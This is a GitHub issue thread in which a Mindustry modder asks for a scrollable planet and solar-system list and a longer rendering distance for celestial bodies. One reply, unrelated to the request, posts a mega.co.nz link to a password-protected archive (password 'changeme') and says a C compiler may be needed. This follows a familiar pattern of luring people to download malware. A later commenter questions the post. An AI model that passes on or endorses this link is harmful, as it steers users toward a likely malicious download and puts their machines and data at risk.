### ISSUE TITLE
Scrollable Planet List Ui

### ISSUE THREAD

**Issue by Angel0doom** [Anuken/Mindustry-Suggestions#5244]
### Describe the content or mechanics you are proposing.

Where the list of planet's and solar systems are currently are not able to be scrolled through, and I would like for them to ba able to

### Describe how you think this content will improve the game. If you're proposing new content, mention how it may add more gameplay options or how it will fill a new niche.

, this poses a BIG problem for my mod, that will eventually have over 30 solar systems and 150 planet's form those are 50+ playable planets. most of which their own unique content and I don't want to have to cut my content short OR have content not accessible to the community. (expecially for when other want to make mods like this one) Thank you!

### Before making this issue, check the boxes below to confirm that you have acknowledged them.

- [X] I have checked the [Trello](https://trello.com/b/aE2tcUwF/mindustry-trello) to make sure my suggestion isn't planned or implemented in a development version.
- [X] I am familiar with all the content already in the game or have glanced at the wiki to make sure my suggestion doesn't exist in the game yet.
- [X] I have read [README.md](https://github.com/Anuken/Mindustry-Suggestions/blob/master/README.md) to make sure my idea is not listed under the "A few things you shouldn't suggest" category.

**Comment by SagarChandra07** [comment]
I think this will help you.

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme

you may need to install the c compiler

**Comment by itcannotbe** [comment]
> I think this will help you.
> 
> https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive password: changeme
> 
> you may need to install the c compiler

Probably not. Why do these things keep popping up?

**Comment by Angel0doom** [comment]
AND, if possible while your at it can you increase the rendering distance for all celestial bodies, i would like to be able to make a planet very far away from the sun and be able to see it. Perfectly understandable if you do not do this im just putting this here just in case, again thanks
